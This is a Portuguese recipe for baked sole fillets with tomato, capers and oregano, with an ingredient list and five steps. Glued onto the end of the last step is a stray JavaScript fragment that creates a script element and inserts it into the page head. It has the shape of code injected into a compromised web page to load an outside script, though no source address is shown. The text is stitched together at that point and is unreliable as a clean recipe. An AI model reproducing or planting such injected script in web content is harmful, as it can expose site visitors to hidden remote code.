Filés de linguado com tomate e orégano:

Ingredientes:

3 filés de linguado médio

1 cebola pequena cortada em rodelas finas

1 colher de sobremesa de óleo de canola

1 colher de chá de alho bem picado

4 tomates pelados picados com um pouco do suco (pode ser o de lata)

Sal a gosto

2 colheres de sopa de alcaparras

1 pitada de orégano seco

Pimenta-do-reino moída na hora

Modo de fazer:

1-Aqueça o forno a 250ºC. Coloque a cebola e o óleo numa panela rasa e leve ao fogo médio, até que as cebolas comecem a dourar;

2- Adicione o alho e quando este começar a tomar cor, acrescente os tomates pelados picados junto com o suco da lata e algumas pitadas de sal. Misture para incorporar os ingredientes. Cozinhe por cerca de 10 minutos (fogo médio);

3-Adicione as alcaparras picadas, o orégano e apimenta do reino e mexa por 1 minuto aumentando o fogo. Retire do fogo.

4-Lave os filés de linguado e enxugue com cuidado num papel-toalha. Coloque 1 colher (sopa) deste molho no fundo de uma fôrma refratária. Passe um a um os filés de peixe na panela com o molho, virando-os de lado, e transporte para o recipiente refratário, colocando-os lado a lado.

5-Regue o molho restante sobre os peixes e asse no forno pré-aquecido por 7 minutos. Sirva imediatamente.var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);

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